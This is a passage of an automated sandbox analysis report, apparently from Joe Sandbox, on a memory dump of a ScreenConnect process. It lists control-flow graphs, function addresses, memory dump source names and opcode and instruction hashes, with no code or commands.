                                                                                                                                                                                                                                                          control_flow_graph 113 7ff888265e94-7ff888265fcc 135 7ff888265fd3-7ff88826606a 113->135 139 7ff88826606c-7ff88826606e 135->139 140 7ff888266070-7ff888266071 135->140 141 7ff888266078-7ff888266085 139->141 140->141 142 7ff8882660bb 141->142 143 7ff888266087-7ff88826609f 141->143 144 7ff8882660bf-7ff8882660c2 142->144 148 7ff8882660bd 143->148 149 7ff8882660a1-7ff8882660b6 143->149 145 7ff8882660d5-7ff8882660d8 144->145 146 7ff8882660c4-7ff8882660d1 144->146 151 7ff8882660da-7ff8882660db 145->151 152 7ff8882660e2-7ff88826610b 145->152 146->145 153 7ff8882660d3 146->153 148->144 149->135 151->152 158 7ff888266112-7ff888266154 152->158 153->145 161 7ff8882661be-7ff8882661c4 158->161 162 7ff888266156-7ff8882661a9 158->162 164 7ff8882661fa 161->164 165 7ff8882661c6-7ff8882661de 161->165 167 7ff8882661af-7ff8882661b0 162->167 168 7ff8882661ab-7ff8882661ad 162->168 166 7ff8882661fe-7ff888266201 164->166 173 7ff8882661fc 165->173 174 7ff8882661e0-7ff8882661f5 165->174 169 7ff888266214-7ff888266217 166->169 170 7ff888266203-7ff888266210 166->170 171 7ff8882661b7-7ff8882661ba 167->171 168->171 176 7ff888266219-7ff88826621a 169->176 177 7ff888266221-7ff88826627f call 7ff888265240 169->177 170->169 178 7ff888266212 170->178 171->161 173->166 174->158 176->177 185 7ff888266281-7ff888266284 177->185 186 7ff8882662f0-7ff888266302 177->186 178->169 188 7ff888266305-7ff88826630c 185->188 189 7ff888266286-7ff8882662c8 call 7ff888265418 call 7ff888265428 call 7ff888265250 185->189 186->188 190 7ff88826630d-7ff88826632f 188->190 191 7ff888266448-7ff8882664aa 188->191 201 7ff888266333-7ff888266337 189->201 212 7ff8882662ca-7ff8882662d5 189->212 190->201 209 7ff8882668c9-7ff8882668e7 call 7ff8882607a0 * 2 191->209 210 7ff8882664b0-7ff8882664ce call 7ff8882607a0 * 2 191->210 204 7ff888266339-7ff888266348 201->204 211 7ff88826638c-7ff8882663be 204->211 229 7ff8882668ed-7ff8882668f4 209->229 230 7ff8882669f3-7ff8882669fe 209->230 227 7ff88826675f-7ff88826677d call 7ff8882607a0 * 2 210->227 228 7ff8882664d4-7ff8882664e6 210->228 212->211 222 7ff8882662db-7ff8882662ed 212->222 222->204 223 7ff8882662ef 222->223 223->186 248 7ff88826677f-7ff888266789 227->248 249 7ff8882667a7-7ff8882667c5 call 7ff8882607a0 * 2 227->249 238 7ff8882664ec-7ff8882664fa 228->238 239 7ff8882664e8-7ff8882664ea 228->239 231 7ff888266907-7ff888266909 229->231 232 7ff8882668f6-7ff8882668f9 229->232 237 7ff888266910-7ff888266934 231->237 235 7ff8882668fe-7ff888266905 232->235 235->231 247 7ff88826690b 235->247 245 7ff888266936-7ff888266941 237->245 246 7ff888266980-7ff8882669b0 237->246 242 7ff8882664fd-7ff888266512 238->242 239->242 259 7ff888266518-7ff88826653c call 7ff888265558 * 2 242->259 260 7ff888266514-7ff888266516 242->260 245->235 245->246 276 7ff8882669b6-7ff8882669c5 246->276 277 7ff8882669b2-7ff8882669b4 246->277 247->237 255 7ff88826679d 248->255 256 7ff88826678b-7ff88826679b 248->256 269 7ff88826687c-7ff888266887 249->269 270 7ff8882667cb-7ff8882667d6 249->270 258 7ff88826679f-7ff8882667a0 255->258 256->258 258->249 265 7ff88826653f-7ff888266554 259->265 260->265 273 7ff88826655a-7ff88826657e call 7ff888265558 * 2 265->273 274 7ff888266556-7ff888266558 265->274 285 7ff88826688d-7ff88826689c 269->285 286 7ff888266889-7ff88826688b 269->286 287 7ff8882667dc-7ff8882667eb 270->287 288 7ff8882667d8-7ff8882667da 270->288 278 7ff888266581-7ff888266596 273->278 274->278 282 7ff8882669c8-7ff8882669cf 276->282 277->282 298 7ff88826659c-7ff8882665c0 call 7ff888265558 278->298 299 7ff888266598-7ff88826659a 278->299 283 7ff8882669e4-7ff8882669e5 282->283 284 7ff8882669d1-7ff8882669e2 282->284 291 7ff8882669e7-7ff8882669ec 283->291 284->291 293 7ff88826689f-7ff8882668a1 285->293 286->293 294 7ff8882667ee-7ff888266822 287->294 288->294 291->230 293->230 302 7ff8882668a7-7ff8882668b9 293->302 294->269 307 7ff888266824-7ff888266829 294->307 304 7ff8882665c3-7ff8882665d1 298->304 299->304 310 7ff8882668ba 302->310 316 7ff8882665d7-7ff8882665e5 304->316 317 7ff8882665d3-7ff8882665d5 304->317 309 7ff88826682c-7ff888266832 307->309 311 7ff888266845-7ff88826684d 309->311 312 7ff888266834-7ff88826683c 309->312 310->310 314 7ff88826684e-7ff88826684f 311->314 318 7ff88826685f 311->318 312->314 315 7ff88826683e-7ff888266843 312->315 319 7ff888266854-7ff88826685e call 7ff888265590 314->319 315->319 321 7ff8882665e8-7ff888266610 316->321 317->321 320 7ff888266865-7ff88826687a 318->320 319->320 320->269 320->309 321->227 329 7ff888266616-7ff88826661d 321->329 329->227 330 7ff888266623-7ff88826663a 329->330 332 7ff88826663c-7ff88826664e 330->332 333 7ff88826666f-7ff88826667a 330->333 336 7ff888266654-7ff888266662 332->336 337 7ff888266650-7ff888266652 332->337 338 7ff88826667c-7ff88826667e 333->338 339 7ff888266680-7ff88826668f 333->339 340 7ff888266665-7ff888266668 336->340 337->340 341 7ff888266692-7ff888266694 338->341 339->341 340->333 344 7ff888266749-7ff88826675b 341->344 345 7ff88826669a-7ff8882666b1 341->345 344->227 345->344 348 7ff8882666b7-7ff8882666d4 345->348 351 7ff8882666d6-7ff8882666de 348->351 352 7ff8882666e0 348->352 353 7ff8882666e2-7ff8882666e4 351->353 352->353 353->344 355 7ff8882666e6-7ff8882666f0 353->355 356 7ff8882666fe-7ff888266706 355->356 357 7ff8882666f2-7ff8882666fc call 7ff8882639e8 355->357 358 7ff888266708-7ff88826672d call 7ff888265368 356->358 359 7ff888266734-7ff888266747 call 7ff888265580 356->359 357->227 357->356 358->359 359->227
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 6$6
                                                                                                                                                                                                                                                          • API String ID: 0-344375709
                                                                                                                                                                                                                                                          • Opcode ID: 8e1b4cd971c71ca891e5e9a9548ebb14af044a36a0cba4d834c246508718194c
                                                                                                                                                                                                                                                          • Instruction ID: e9763a79dbb232547beed6c786c684ab67aa359db388197f52b9eb189903c94c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e1b4cd971c71ca891e5e9a9548ebb14af044a36a0cba4d834c246508718194c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C052B030A0CA4A8FEB99EB2884557BA77E2FF94392F54057DD04EC3292DF28B845C745
                                                                                                                                                                                                                                                          Function 00007FF88826DA5D Relevance: 3.2, Strings: 2, Instructions: 692COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 583 7ff88826da5d-7ff88826daca 586 7ff88826dacc-7ff88826dad2 583->586 587 7ff88826db3b-7ff88826db40 583->587 586->587 588 7ff88826db5b-7ff88826dc88 call 7ff888269ff0 * 16 587->588 589 7ff88826db42-7ff88826db55 587->589 624 7ff88826dc8a-7ff88826dc8d 588->624 625 7ff88826dce1-7ff88826dcf4 588->625 589->588 626 7ff88826dd0e-7ff88826dd33 624->626 627 7ff88826dc8f-7ff88826dc9a 624->627 629 7ff88826dcf6-7ff88826dd00 625->629 630 7ff88826dd75 625->630 633 7ff88826dd34-7ff88826dd37 626->633 629->626 632 7ff88826dda9-7ff88826ddac 630->632 630->633 635 7ff88826ddb3-7ff88826de13 call 7ff888269ff0 * 5 632->635 634 7ff88826dd38 633->634 633->635 634->632 636 7ff88826dd39-7ff88826dd3a 634->636 647 7ff88826de6c-7ff88826de6e 635->647 648 7ff88826de15-7ff88826de18 635->648 636->630 651 7ff88826deea-7ff88826deec 647->651 652 7ff88826de70 647->652 649 7ff88826de1a-7ff88826de66 648->649 650 7ff88826de99-7ff88826de9b 648->650 661 7ff88826ded7-7ff88826dee2 649->661 674 7ff88826de68 649->674 655 7ff88826df1c-7ff88826df20 650->655 656 7ff88826de9d 650->656 657 7ff88826deee 651->657 658 7ff88826df6d-7ff88826df6e 651->658 653 7ff88826de72 652->653 654 7ff88826de73-7ff88826de96 call 7ff888269ff0 652->654 653->654 662 7ff88826deef-7ff88826df1b call 7ff888269ff8 654->662 678 7ff88826de98 654->678 664 7ff88826df22-7ff88826df3e 655->664 665 7ff88826dfa1-7ff88826dfb1 655->665 656->661 657->662 660 7ff88826df74-7ff88826df76 658->660 668 7ff88826dfcf 660->668 669 7ff88826df78-7ff88826df7b 660->669 666 7ff88826df5e 661->666 670 7ff88826dee4-7ff88826dee5 661->670 662->655 662->660 664->666 671 7ff88826e022-7ff88826e024 665->671 672 7ff88826dfb3 665->672 675 7ff88826dfda-7ff88826dfdc 666->675 676 7ff88826df60 666->676 668->675 679 7ff88826dffc-7ff88826e01d call 7ff888269ff0 669->679 680 7ff88826df7d-7ff88826df98 669->680 670->651 677 7ff88826e026 671->677 672->668 674->647 675->679 682 7ff88826df62 676->682 683 7ff88826df63-7ff88826df6b 676->683 677->677 684 7ff88826e02a-7ff88826e040 677->684 678->650 679->671 680->665 682->683 683->658 688 7ff88826e042 684->688 689 7ff88826e0b1-7ff88826e17e call 7ff888269db8 call 7ff888269ff0 * 4 684->689 688->689 704 7ff88826e1d7-7ff88826e212 call 7ff888269ff0 689->704 705 7ff88826e180-7ff88826e183 689->705 711 7ff88826e21c-7ff88826e4c5 call 7ff888269f40 * 3 704->711 707 7ff88826e204-7ff88826e212 705->707 708 7ff88826e185-7ff88826e195 705->708 707->711 708->704 744 7ff88826e4d7 711->744 745 7ff88826e4c7-7ff88826e4ce 711->745 748 7ff88826e4e9-7ff88826e4f1 744->748 749 7ff88826e4d9-7ff88826e4de 744->749 746 7ff88826e4e0 745->746 747 7ff88826e4d0-7ff88826e4d5 745->747 750 7ff88826e4f2-7ff88826e4fb 746->750 751 7ff88826e4e2-7ff88826e4e7 call 7ff88826a010 746->751 747->744 748->750 749->746 755 7ff88826e50d 750->755 756 7ff88826e4fd-7ff88826e504 750->756 753 7ff88826e4ec-7ff88826e4f1 751->753 753->750 759 7ff88826e51f-7ff88826e527 755->759 760 7ff88826e50f-7ff88826e514 755->760 757 7ff88826e516 756->757 758 7ff88826e506-7ff88826e50b 756->758 761 7ff88826e528-7ff88826e54a call 7ff888269ff0 757->761 762 7ff88826e518-7ff88826e527 call 7ff88826a010 757->762 758->755 759->761 760->757 768 7ff88826e54c-7ff88826e54f 761->768 769 7ff88826e5a3-7ff88826e5cd call 7ff888269ff8 * 2 761->769 762->761 770 7ff88826e5d0-7ff88826e63d call 7ff888269ff8 * 3 call 7ff888269ff0 768->770 771 7ff88826e551-7ff88826e561 768->771 769->770 785 7ff88826e643 770->785 785->785
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: Jr$Jr
                                                                                                                                                                                                                                                          • API String ID: 0-944056412
                                                                                                                                                                                                                                                          • Opcode ID: bc3caa35a9e4dbc463c471b5a744536eb0b4b80a2bce2a4fe03ea7eea4a860ac
                                                                                                                                                                                                                                                          • Instruction ID: 54b69743c31e911c9ba2e8652649872a8a8c37d8160bda5a447de0c8a8f417e6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc3caa35a9e4dbc463c471b5a744536eb0b4b80a2bce2a4fe03ea7eea4a860ac
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B42BE3090864A8BEB58EB28C8A17E977A1FF45342F1401BED44ED72C6DF3C6946CB56
                                                                                                                                                                                                                                                          Function 00007FF888265606 Relevance: 1.0, Instructions: 1042COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c960813f5b4d81628e04fd6811b551014637a1c48462b0b6df96ec497d15e35b
                                                                                                                                                                                                                                                          • Instruction ID: b9380848f6d4ab0e37210fd11b96bee636dd0934b7b8f5866c0cb7ad430d14f6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c960813f5b4d81628e04fd6811b551014637a1c48462b0b6df96ec497d15e35b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B262C031A1CA5B8BE7A9EA2984553F932D2FF94396F540079D44EC72C6DF2CB806C385
                                                                                                                                                                                                                                                          Function 00007FF88826906D Relevance: .6, Instructions: 553COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 14893abc6ebf37c9f03d0332300b3681ade524ddb24c435db70ad48f4cc10523
                                                                                                                                                                                                                                                          • Instruction ID: 4156a565cfa04bef864ea090ac61e8c0611dd8bc9ca335b3688fa2d7c51e04cb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14893abc6ebf37c9f03d0332300b3681ade524ddb24c435db70ad48f4cc10523
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FF14721A0CA8A4FE799EA2C98551B577D1FF543A1F4801BAD44EC7293EF29FC06C385
                                                                                                                                                                                                                                                          Function 00007FF888265A59 Relevance: .5, Instructions: 518COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: bb053f1a535663c526ea02f21d2d1023d590fa210d3bd27d0b07425ab70d79fc
                                                                                                                                                                                                                                                          • Instruction ID: 2e8aa20d7f3c36ee09f1ab0cdb854e3cc0fc4bee26b46c31ae662d151b88db15
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb053f1a535663c526ea02f21d2d1023d590fa210d3bd27d0b07425ab70d79fc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44F1C131A0CA4B8BE7A9EA2984656F972D2FF94395F540079D44EC72C6DF2CB806C345
                                                                                                                                                                                                                                                          Function 00007FF888265844 Relevance: .4, Instructions: 418COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: fe467b7354699c8f1b6487fb5695f2fe9a31804cf07d14f1e2b024c018eeb9dd
                                                                                                                                                                                                                                                          • Instruction ID: 47d310bd0ebb83d0398b2b29a4fb65e3d958a8c335990cbb9e9da78b86d00258
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe467b7354699c8f1b6487fb5695f2fe9a31804cf07d14f1e2b024c018eeb9dd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8D1A430A08E478BEBA9EA2984656FE63D2FF94391F540479D44EC72C6DF2CB805C785
                                                                                                                                                                                                                                                          Function 00007FF88826E198 Relevance: 2.8, Strings: 2, Instructions: 287COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 951 7ff88826e198-7ff88826e1cb 953 7ff88826e23c 951->953 954 7ff88826e1cd-7ff88826e1d3 951->954 955 7ff88826e29c-7ff88826e4c5 call 7ff888269f40 * 3 953->955 956 7ff88826e24f-7ff88826e262 954->956 957 7ff88826e1d5 954->957 999 7ff88826e4d7 955->999 1000 7ff88826e4c7-7ff88826e4ce 955->1000 963 7ff88826e274 956->963 964 7ff88826e264-7ff88826e272 956->964 958 7ff88826e1d8-7ff88826e234 call 7ff888269ff0 957->958 959 7ff88826e1d7 957->959 958->953 959->958 969 7ff88826e276-7ff88826e284 963->969 970 7ff88826e287-7ff88826e29b 963->970 964->963 969->970 970->955 1003 7ff88826e4e9-7ff88826e4f1 999->1003 1004 7ff88826e4d9-7ff88826e4de 999->1004 1001 7ff88826e4e0 1000->1001 1002 7ff88826e4d0-7ff88826e4d5 1000->1002 1005 7ff88826e4f2-7ff88826e4fb 1001->1005 1006 7ff88826e4e2-7ff88826e4e7 call 7ff88826a010 1001->1006 1002->999 1003->1005 1004->1001 1010 7ff88826e50d 1005->1010 1011 7ff88826e4fd-7ff88826e504 1005->1011 1008 7ff88826e4ec-7ff88826e4f1 1006->1008 1008->1005 1014 7ff88826e51f-7ff88826e527 1010->1014 1015 7ff88826e50f-7ff88826e514 1010->1015 1012 7ff88826e516 1011->1012 1013 7ff88826e506-7ff88826e50b 1011->1013 1016 7ff88826e528-7ff88826e54a call 7ff888269ff0 1012->1016 1017 7ff88826e518-7ff88826e527 call 7ff88826a010 1012->1017 1013->1010 1014->1016 1015->1012 1023 7ff88826e54c-7ff88826e54f 1016->1023 1024 7ff88826e5a3-7ff88826e5cd call 7ff888269ff8 * 2 1016->1024 1017->1016 1025 7ff88826e5d0-7ff88826e63d call 7ff888269ff8 * 3 call 7ff888269ff0 1023->1025 1026 7ff88826e551-7ff88826e561 1023->1026 1024->1025 1040 7ff88826e643 1025->1040 1040->1040
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: Jr$Jr
                                                                                                                                                                                                                                                          • API String ID: 0-944056412
                                                                                                                                                                                                                                                          • Opcode ID: 02ccf97ff42671a6600c977e6592ee18d4bbf21b53f1500e656cf6091adda73d
                                                                                                                                                                                                                                                          • Instruction ID: d1a599c475249624a452faaf766fcd215883a6d438b29751f29ddbe2b34ac8e3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02ccf97ff42671a6600c977e6592ee18d4bbf21b53f1500e656cf6091adda73d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0A1DC34A1C54A8BEB5CEA18C8527FD76A2FF95342F500079E04AD32C6DF2C694ACB52
                                                                                                                                                                                                                                                          Function 00007FF88826CDED Relevance: 1.7, Strings: 1, Instructions: 458COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1041 7ff88826cded-7ff88826cdf0 1042 7ff88826cdf2 1041->1042 1043 7ff88826cde3 1041->1043 1042->1041 1044 7ff88826cdf5-7ff88826cdf9 1042->1044 1043->1041 1046 7ff88826cdfd-7ff88826ce02 1044->1046 1046->1046 1047 7ff88826ce05-7ff88826ce09 1046->1047 1049 7ff88826ce0b-7ff88826ce1b 1047->1049 1050 7ff88826ce52 1047->1050 1059 7ff88826ce1d-7ff88826ce20 1049->1059 1051 7ff88826ce4d-7ff88826ce50 1050->1051 1052 7ff88826ce55-7ff88826ce6a 1050->1052 1051->1050 1057 7ff88826ce6c-7ff88826ce71 1052->1057 1058 7ff88826ce86 1052->1058 1060 7ff88826cea2 1057->1060 1061 7ff88826ce73-7ff88826ce7a 1057->1061 1062 7ff88826ce87-7ff88826ce95 1058->1062 1063 7ff88826ce29-7ff88826ce39 1059->1063 1064 7ff88826ce22-7ff88826ce23 1059->1064 1068 7ff88826cebe-7ff88826cec1 1060->1068 1069 7ff88826cea4-7ff88826cea8 1060->1069 1072 7ff88826ce7c-7ff88826ce85 1061->1072 1073 7ff88826ce96 1061->1073 1062->1073 1080 7ff88826ce97-7ff88826cea1 1062->1080 1064->1059 1066 7ff88826ce25-7ff88826ce27 1064->1066 1066->1063 1070 7ff88826cef2-7ff88826cf05 1068->1070 1071 7ff88826cec3-7ff88826cec9 1068->1071 1076 7ff8882747b0-7ff8882747e0 1069->1076 1078 7ff88826cf4f 1070->1078 1079 7ff88826cf07-7ff88826cf2d 1070->1079 1082 7ff88826cecc-7ff88826ced9 1071->1082 1083 7ff88826cee6-7ff88826ceef 1071->1083 1072->1058 1072->1062 1073->1080 1085 7ff88826cf50-7ff88826cf51 1078->1085 1084 7ff88826cf2f-7ff88826cf3b call 7ff88826ccc8 1079->1084 1080->1060 1082->1085 1091 7ff88826cedb-7ff88826cee0 1082->1091 1083->1070 1092 7ff88826cf40-7ff88826cf4e 1084->1092 1090 7ff88826cf52 1085->1090 1093 7ff88826cf53-7ff88826cf61 1090->1093 1091->1083 1092->1078 1094 7ff88826cf68-7ff88826cf84 call 7ff88826ccd8 call 7ff888268fd8 call 7ff888268fe8 1093->1094 1100 7ff88826cf89-7ff88826cf8d 1094->1100 1101 7ff88826cf94-7ff88826cf9e 1100->1101 1102 7ff88826cfa6-7ff88826cfab call 7ff888269ff0 1101->1102 1104 7ff88826cfb0-7ff88826cfb7 call 7ff888269ff0 1102->1104 1106 7ff88826cfbc-7ff88826cfd2 1104->1106 1107 7ff88826cfdb-7ff88826cff4 call 7ff888268ff8 1106->1107 1110 7ff88826cffa-7ff88826cfff call 7ff88826cce8 1107->1110 1112 7ff88826d004-7ff88826d089 call 7ff888269068 call 7ff88826ccf8 1110->1112 1122 7ff88826d0fa-7ff88826d11b call 7ff88826cd08 1112->1122 1123 7ff88826d08b-7ff88826d094 1112->1123 1129 7ff88826d11c-7ff88826d135 1122->1129 1127 7ff88826d0da-7ff88826d0e9 1123->1127 1128 7ff88826d096-7ff88826d0c3 1123->1128 1134 7ff88826d15a-7ff88826d16a 1127->1134 1135 7ff88826d0eb-7ff88826d0f2 1127->1135 1128->1129 1133 7ff88826d0c5-7ff88826d0c8 1128->1133 1140 7ff88826d13a-7ff88826d144 1129->1140 1138 7ff88826d0ca-7ff88826d0d4 1133->1138 1139 7ff88826d149-7ff88826d158 call 7ff88826cd18 1133->1139 1136 7ff88826d16e-7ff88826d1c3 1134->1136 1135->1136 1137 7ff88826d0f4 1135->1137 1136->1076 1137->1140 1141 7ff88826d0f6-7ff88826d0f8 1137->1141 1138->1127 1139->1134 1140->1139 1141->1122
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: {6
                                                                                                                                                                                                                                                          • API String ID: 0-1623870270
                                                                                                                                                                                                                                                          • Opcode ID: d9672dfc0b93e1f6839fd57c9df388a55976baf174fb525aaca8384a4ef1397e
                                                                                                                                                                                                                                                          • Instruction ID: a03cadb18c90f9e0d570410bbbce1a84365585e1ef60aeed04abbc741add7270
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9672dfc0b93e1f6839fd57c9df388a55976baf174fb525aaca8384a4ef1397e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39E1E031A0CA864FE359EB289855AE93BE1FF99351F4401BAD44DC72D3DF28B806C749
                                                                                                                                                                                                                                                          Function 00007FF887F58014 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1894231024.00007FF887F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F50000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff887f50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                                          • Opcode ID: 7558210ab22f5343aa92fd0547273867f92d8563e21723d2e2db495be770f83e
                                                                                                                                                                                                                                                          • Instruction ID: 73440438891a8b4d41b68f075ea0f0b26ba349bc80ecd43ec53700214c98d1c8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7558210ab22f5343aa92fd0547273867f92d8563e21723d2e2db495be770f83e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C514731D0CB884FDB14AFA8D84A5E97BF0FF55360F04017EE459C3192DE68A846CB92
                                                                                                                                                                                                                                                          Function 00007FF88826A944 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 6
                                                                                                                                                                                                                                                          • API String ID: 0-922970802
                                                                                                                                                                                                                                                          • Opcode ID: 0198595deb3c1a9f7984c1ae609e6f2c8e49007258a9663fbf752c3849c09018
                                                                                                                                                                                                                                                          • Instruction ID: 3707a7b163a98561b34e1530af5eb3bf47a21d05e2ae550fe3170c3c28b95b8a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0198595deb3c1a9f7984c1ae609e6f2c8e49007258a9663fbf752c3849c09018
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF510420A1CA8A4FE759E72894556B977E1FF95791F5801FAD049C32D7CF28BC02C346
                                                                                                                                                                                                                                                          Function 00007FF88826BE62 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
